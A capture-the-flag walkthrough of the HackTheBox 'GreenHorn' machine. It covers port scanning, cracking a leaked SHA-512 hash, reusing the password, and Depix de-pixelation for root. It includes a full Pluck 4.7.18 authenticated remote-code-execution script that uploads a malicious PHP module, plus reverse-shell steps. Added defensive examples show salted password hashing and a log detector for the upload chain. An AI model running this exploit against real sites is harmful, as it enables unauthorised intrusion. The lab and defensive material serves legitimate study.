HacktheBox-GreenHorn

Information gathering

fscan -h 10.10.11.25

start infoscan
(icmp) Target 10.10.11.25 is alive
[*] Icmp alive hosts len is: 1
10.10.11.25:22 open
10.10.11.25:80 open
10.10.11.25:3000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://10.10.11.25 code:302 len:154 title:302 Found 跳转url: http://greenhorn.htb/
[*] WebTitle: http://10.10.11.25:3000 code:200 len:13904 title:GreenHorn
[+] InfoScan:http://10.10.11.25:3000 [Gitea简易Git服务]
[*] WebTitle: http://greenhorn.htb/?file=welcome-to-greenhorn code:200 len:2445 title:Welcome to GreenHorn ! - GreenHorn

http://10.10.11.25:3000/

This is a Git hosting platform (Gitea). Register an account, log in, and you can read the source code of the GreenHorn application:
(Screenshot: Clip_2024-08-01_13-50-31.png)
data\settings\pass.php contains something that looks like a password, stored as a hash:

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

Look it up in an online hash database ("Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online").

The plaintext behind the hash is: iloveyou1
I didn't find where this password is used. A web search showed it belongs to greenhorn.htb/login.php, but I couldn't even load that page; it only worked after resetting the box.
(Screenshot: Clip_2024-08-01_14-30-39.png)
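The hash is 128 hex characters, which is why an online lookup succeeds: an unsalted SHA-512 of a common password always yields the same digest, so it can be precomputed. The Python below is an added example, not part of the original writeup or of Pluck. It identifies the digest by its length, checks a candidate against it offline with hashlib, and contrasts that with salted PBKDF2 storage (hash_password and verify_password are names chosen here) which produces a different string for the same password every time and cannot be matched by a lookup table.

```python
import hashlib
import hmac
import secrets

# Hash copied from data/settings/pass.php as shown on the page.
PLUCK_HASH = (
    "d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d7704"
    "86743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163"
)

# Hex digest length -> unsalted algorithms that produce it.
HEX_LENGTH_TO_ALGOS = {
    32: ("md5",),
    40: ("sha1",),
    64: ("sha256",),
    128: ("sha512",),
}


def identify_by_length(digest_hex):
    """Return candidate algorithm names for a hex digest, based only on its length."""
    s = digest_hex.strip().lower()
    if not s or any(c not in "0123456789abcdef" for c in s):
        return ()
    return HEX_LENGTH_TO_ALGOS.get(len(s), ())


def check_candidate(digest_hex, candidate):
    """Return the algorithm name if hashing `candidate` reproduces the digest, else None."""
    target = digest_hex.strip().lower()
    for algo in identify_by_length(target):
        computed = hashlib.new(algo, candidate.encode()).hexdigest()
        if hmac.compare_digest(computed, target):
            return algo
    return None


def hash_password(password, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256 (hypothetical storage format chosen for this example)."""
    salt = secrets.token_bytes(16)  # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored, password):
    """Recompute the PBKDF2 digest with the stored salt and compare in constant time."""
    scheme, iters, salt_hex, dk_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("candidate algorithms:", identify_by_length(PLUCK_HASH))
    # The page states the plaintext is iloveyou1; this reproduces the lookup offline.
    print("iloveyou1 matches as:", check_candidate(PLUCK_HASH, "iloveyou1"))
    stored = hash_password("iloveyou1")
    print("salted form:", stored)
    print("verify:", verify_password(stored, "iloveyou1"))
```

Because the salt is random, two calls to hash_password with the same input give different strings, so a database of precomputed digests is useless against it; the cost of the iteration count also slows down guessing.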
Then search for an n-day: Pluck 4.7.18

#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux


import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
# Pluck's login form takes only a password (field cont1)
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}

file_path = input("ZIP file path: ")

# the zip is sent as a "module" through the install-module form
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


# the zip is extracted under data/modules/<zip name>/, so the file inside is reachable by URL
rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"

rce=requests.get(rce_url)

print(rce.text)

According to the exploit, the upload happens on the "install module" page as a zip file. First build evil.zip, which is simply the malicious PHP file placed into a zip:

echo "xxx" > evil.php    # "xxx" stands for the PHP file contents
zip evil.zip evil.php

Get a shell.
(Screenshot: Clip_2024-08-01_15-05-55.png)
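From the defender's side, the chain the exploit performs leaves a clear trace in the web server access log: a POST to admin.php?action=installmodule followed shortly by a request for a .php file under data/modules/. The script below is an added example, not from the writeup or from Pluck itself; the log lines are constructed in combined log format for the sake of the example, the module directory name "evil" is assumed from the zip name above, and find_module_upload_chains is a name chosen here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (combined format); not real traffic from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Aug/2024:15:04:50 +0000] "POST /login.php HTTP/1.1" 302 0 "http://greenhorn.htb/login.php" "python-requests/2.31.0"
10.10.14.5 - - [01/Aug/2024:15:04:51 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 1843 "http://greenhorn.htb/admin.php?action=installmodule" "python-requests/2.31.0"
10.10.14.5 - - [01/Aug/2024:15:04:52 +0000] "GET /data/modules/evil/evil.php HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
10.10.14.9 - - [01/Aug/2024:15:10:00 +0000] "GET /?file=welcome-to-greenhorn HTTP/1.1" 200 2445 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Aug/2024:15:10:05 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 1843 "http://greenhorn.htb/admin.php?action=installmodule" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Any PHP file directly under a module directory; modules are extracted from uploaded zips.
MODULE_PHP_RE = re.compile(r"^/data/modules/[^/]+/[^/?]+\.php")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_module_upload_chains(log_text, window=timedelta(minutes=10)):
    """Return (ip, path, seconds_after_install) for PHP hits under data/modules/
    that follow an install-module POST from the same client within `window`."""
    installs = defaultdict(list)  # ip -> timestamps of install-module POSTs
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and "action=installmodule" in rec["path"]:
            installs[rec["ip"]].append(rec["ts"])
            continue
        if MODULE_PHP_RE.match(rec["path"]):
            recent = [t for t in installs[rec["ip"]] if timedelta(0) <= rec["ts"] - t <= window]
            if recent:
                delay = int((rec["ts"] - recent[-1]).total_seconds())
                findings.append((rec["ip"], rec["path"], delay))
    return findings


if __name__ == "__main__":
    for ip, path, delay in find_module_upload_chains(SAMPLE_LOG):
        print(f"ALERT {ip} requested {path} {delay}s after installing a module")
```

Only the first client trips the rule: the second one installs a module but never requests a PHP file under it. On the host, the same event can be confirmed by listing recently created .php files under data/modules/, and the install-module action can be gated by restricting admin.php to trusted addresses.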

user

Reverse shell; copy one from here:

Reverse shell tool

(Screenshot: Clip_2024-08-01_15-08-38.png)
(Screenshot: Clip_2024-08-01_15-09-12.png)
Right now we only have www-data privileges and cannot get the user flag.
Under /home there is a user junior; reuse the earlier password.
(Screenshot: Clip_2024-08-01_15-11-08.png)
(Screenshot: Clip_2024-08-01_15-13-00.png)
(Screenshot: Clip_2024-08-01_15-25-05.png)

root

PDF restoration (de-pixelating the image with Depix)

pip3 install --upgrade Pillow
python3 depix.py -p /home/kali/Desktop/Depix-main/output.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png

(Screenshot: Clip_2024-08-01_15-26-07.png)